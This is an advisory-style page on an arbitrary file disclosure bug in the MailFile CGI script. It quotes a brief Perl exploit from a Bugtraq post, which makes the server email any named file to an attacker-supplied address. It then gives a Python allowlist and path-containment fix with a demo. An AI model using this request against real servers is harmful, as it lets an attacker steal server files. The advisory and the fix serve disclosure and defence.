MailFile Arbitrary File Disclosure Vulnerability

This small exploit was included in the post to Bugtraq by Dirk Brockhausen <bro@brocon.com>:

--snip--

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

# 'domain' and value1..value3 are placeholders; the values are described below.
$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
    [ real_name => 'value1',
      email     => 'value2',
      filename  => 'value3',
    ]);

--snip--

value3 = target filename
value2 = e-mail address the file is sent to
value1 = username; can be anything
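
The request above works because the script mails out whatever file the client-supplied filename field names. The following is an added example, not code from the original post or from MailFile, of a server-side check that closes this. It assumes the files offered for mailing live in one directory and are listed by bare name; the directory, file names and function names are hypothetical, and Python is used only for illustration.

```python
import os
import tempfile

class RejectedFilename(ValueError):
    """The submitted 'filename' field must not be mailed out."""

def resolve_requested_file(base_dir, allowed_names, requested):
    """Return the real path of an allowlisted file inside base_dir, or raise."""
    if not requested or "\x00" in requested:
        raise RejectedFilename("empty or NUL in name")
    # Accept bare names only: no directories, no absolute paths, no '..'.
    if requested != os.path.basename(requested) or requested in (".", ".."):
        raise RejectedFilename("path components not accepted")
    if requested not in allowed_names:
        raise RejectedFilename("not on allowlist")
    base = os.path.realpath(base_dir)
    real = os.path.realpath(os.path.join(base, requested))
    # realpath follows symlinks, so an allowlisted name that links
    # out of base_dir is caught by the containment check.
    if os.path.commonpath([base, real]) != base:
        raise RejectedFilename("resolves outside served directory")
    if not os.path.isfile(real):
        raise RejectedFilename("not a regular file")
    return real

def demo():
    """Run the check over constructed inputs; returns {name: verdict}."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as root:
        served = os.path.join(root, "served")      # hypothetical download dir
        os.mkdir(served)
        secret = os.path.join(root, "secret.txt")  # lives outside 'served'
        for path in (os.path.join(served, "brochure.txt"), secret):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        os.symlink(secret, os.path.join(served, "link.txt"))
        allowed = {"brochure.txt", "link.txt", "missing.txt"}
        for name in ("brochure.txt", "../secret.txt", "/var/tmp/other.txt",
                     "secret.txt", "link.txt", "missing.txt", ""):
            try:
                resolve_requested_file(served, allowed, name)
                verdicts[name] = "ok"
            except RejectedFilename as exc:
                verdicts[name] = str(exc)
    return verdicts

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(repr(name), "->", verdict)
```

The check covers only the filename field; the recipient address in the email field needs its own validation.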


 
